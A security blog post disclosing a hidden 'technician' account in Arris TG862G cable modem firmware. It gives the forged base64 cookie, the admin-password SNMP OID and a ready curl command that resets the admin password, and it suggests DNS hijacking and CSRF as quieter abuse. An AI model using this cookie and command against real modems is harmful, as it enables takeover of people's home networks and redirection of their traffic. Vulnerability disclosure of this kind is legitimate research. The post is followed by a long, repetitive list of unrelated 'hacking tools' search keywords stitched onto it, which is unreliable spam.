Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -

Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.

Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):

Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9

 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:

{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

And after base64 decoding the "credential" value we get:

{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:

Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9

Which decodes to the following:

{"credential":"dGVjaG5pY2lhbjo="}

And finally:

{"credential":"technician:"} 

Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(

That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:

That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:

Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:

SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);

Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:

HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}

What about setting a new value? Surely that will not work....

That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:

This functionality can be wrapped up in the following curl command:

curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'

Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.

Related word

1. Hacker Techniques Tools And Incident Handling
2. Hacking Tools For Pc
3. Hack Tools For Windows
4. Pentest Tools Port Scanner
5. Hacker
6. Hack Tools Github
7. Hacker Search Tools
8. Underground Hacker Sites
9. Github Hacking Tools
10. Hacker Tools Hardware
11. How To Install Pentest Tools In Ubuntu
12. Pentest Tools Alternative
13. Pentest Tools Download
14. Hak5 Tools
15. Hack Tools Mac
16. Hacker Tools Windows
17. Pentest Tools Review
18. Hacking Tools Usb
19. What Is Hacking Tools
20. Pentest Tools Website
21. Hacker Search Tools
22. Termux Hacking Tools 2019
23. Hacking Tools Mac
24. Hacking Tools For Pc
25. Black Hat Hacker Tools
26. Pentest Tools Website Vulnerability
27. Hack Tools Github
28. Hacking Tools For Windows
29. Best Hacking Tools 2019
30. Ethical Hacker Tools
31. Hacking Tools Mac
32. Ethical Hacker Tools
33. Hacking Tools Usb
34. Pentest Automation Tools
35. Hacking Tools For Mac
36. Top Pentest Tools
37. Hacker Tools
38. Hacking Apps
39. Hacker Tools Online
40. Pentest Tools Framework
41. How To Make Hacking Tools
42. Hacking Tools
43. Hacking Tools For Beginners
44. Hacker Tools Apk
45. Hacker Tools Hardware
46. Pentest Tools List
47. Hack Tools Download
48. Best Pentesting Tools 2018
49. Beginner Hacker Tools
50. Hacker Tools Mac
51. Hack Tools Github
52. Pentest Tools Port Scanner
53. Termux Hacking Tools 2019
54. Game Hacking
55. Pentest Tools Download
56. Underground Hacker Sites
57. Blackhat Hacker Tools
58. Hacking Tools 2020
59. Pentest Tools Website
60. How To Hack
61. Best Hacking Tools 2020
62. Hacking Tools For Windows Free Download
63. Hacker Tools Hardware
64. Hack Tools 2019
65. Top Pentest Tools
66. Hacker Tools Apk
67. Hacking Tools Windows
68. Pentest Tools Review
69. Computer Hacker
70. Hacking Tools
71. Hacking Tools Software
72. Physical Pentest Tools
73. What Is Hacking Tools
74. Pentest Tools Bluekeep
75. Hacker Tools Mac
76. Hacker Tool Kit
77. Hacker Tools Free Download
78. How To Make Hacking Tools
79. Hacking Tools Mac
80. Best Hacking Tools 2019
81. New Hack Tools
82. Hacker Tools For Windows
83. Hacker Tools Online
84. Hacker Tools Apk
85. Ethical Hacker Tools
86. Hacker Tool Kit
87. Hacking Tools For Kali Linux
88. Pentest Automation Tools
89. Physical Pentest Tools
90. Hacker Tools Apk
91. Pentest Recon Tools
92. Pentest Tools Apk
93. Hacks And Tools
94. Hackers Toolbox
95. Pentest Reporting Tools
96. Tools 4 Hack
97. Free Pentest Tools For Windows
98. Ethical Hacker Tools
99. Hack Rom Tools
100. Hacking Tools Kit
101. Hacks And Tools
102. Hack App
103. Pentest Tools Windows
104. Hacker Tools Linux
105. World No 1 Hacker Software
106. Pentest Tools For Android
107. Hak5 Tools
108. Hacking Tools For Games
109. Hacker Tools For Ios
110. Physical Pentest Tools
111. Pentest Tools Port Scanner
112. Hacker Tools Apk Download
113. Pentest Tools Windows
114. Pentest Tools Alternative
115. Pentest Tools Nmap
116. Pentest Tools Tcp Port Scanner
117. Usb Pentest Tools
118. Hack Tools For Pc
119. Hacker Tools 2020
120. Hacking Tools
121. Pentest Tools Review
122. Hacking Tools Kit
123. Physical Pentest Tools
124. Hack Tools For Ubuntu
125. Hacker Tools For Pc
126. Free Pentest Tools For Windows
127. Hack Tools Github
128. Hacking Tools Download
129. Hacking Tools Github
130. Hacking Tools Usb
131. Hacking Tools Usb
132. Hacker Tools Free
133. Hacking Tools Software
134. Pentest Tools Port Scanner
135. Beginner Hacker Tools
136. Pentest Tools For Android
137. Pentest Tools Linux
138. Hack App
139. Hack And Tools
140. Hack Tools For Mac
141. Hacker Tools Free
142. Hacker Tools Free Download
143. Nsa Hacker Tools
144. Hacker
145. Hack Tools For Windows
146. Hackrf Tools
147. Hak5 Tools
148. Github Hacking Tools
149. Pentest Box Tools Download
150. Hacker Tools Free
151. Pentest Tools Nmap
152. Tools Used For Hacking
153. Hacker Tools Online
154. Pentest Tools Website
155. Hacking Apps